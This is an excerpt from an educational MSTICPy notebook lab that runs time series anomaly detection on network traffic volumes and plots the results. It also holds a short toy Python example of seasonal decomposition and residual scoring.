MSTICPy has a number of basic ML features to support simple analysis that is common in security investigation, including time series analysis and clustering. In the following section we will look at time series analysis.

In order to effectively hunt in a dataset analysts need to focus on specific events of interest. Below we use MSTICpy's time series analysis machine learning capabilities to identify anomalies in our network traffic for further investigation.
As well as computing anomalies we visualize the data so that we can more easily see where these anomalies present themselves.

In [166]:
# Import MSTICPy's timeseries-specific features
from msticpy.analysis.timeseries import timeseries_anomalies_stl
from msticpy.nbtools.timeseries import display_timeseries_anomolies

# Load some network data to apply our analysis to
stldemo = qry_prov.Network.get_network_summary()

# Conduct our timeseries analysis
output = timeseries_anomalies_stl(stldemo)
# Visualize the timeseries and any anomalies
# (display_timeseries_anomolies is the function name as spelled in the import above)
display_timeseries_anomolies(data=output, y='TotalBytesSent')
Out[166]:
[Bokeh figure: TotalBytesSent time series with anomalies highlighted]
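
The intuition behind decomposition-based anomaly detection is to remove the regular, repeating part of a series and flag whatever is left over that is unusually large. The sketch below is a much simpler stand-in for STL: it estimates only a seasonal component (no trend) using per-position medians, then scores the residuals. The series, PERIOD, and THRESHOLD values are made-up assumptions for illustration, and this is not what timeseries_anomalies_stl does internally.

```python
from statistics import mean, median, pstdev

PERIOD = 4        # assumed season length (points per cycle) for this toy series
THRESHOLD = 3.0   # flag residuals more than 3 standard deviations from the mean

# Made-up traffic volumes: a repeating pattern with one injected spike at index 13
series = [10, 20, 30, 20] * 6
series[13] = 200

# Seasonal component: median of all values at the same position in the cycle
seasonal = [median(series[pos::PERIOD]) for pos in range(PERIOD)]

# Residual: what is left after removing the seasonal component
residuals = [value - seasonal[i % PERIOD] for i, value in enumerate(series)]

# Score residuals and flag the outliers
centre, spread = mean(residuals), pstdev(residuals)
anomalies = [
    i for i, r in enumerate(residuals)
    if spread > 0 and abs(r - centre) / spread > THRESHOLD
]
print(anomalies)
```

Using the median for the seasonal estimate keeps the spike from distorting the "normal" value for its position in the cycle, so the spike remains clearly visible in the residuals.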

Want to learn more?¶

Explore the MSTICPy documentation and the full tutorial at the following resources.

Useful resources:

  • https://github.com/microsoft/msticpy-lab
  • https://github.com/Azure-Samples/azure-python-labs/blob/main/9-MSTICPy/README.md
  • https://msticpy.readthedocs.io/en/latest/index.html#

Credit to the MSTIC team who developed the original lab that this worksheet is based upon. This is a condensed overview of capabilities of the MSTICPy toolkit developed for educational purposes only.
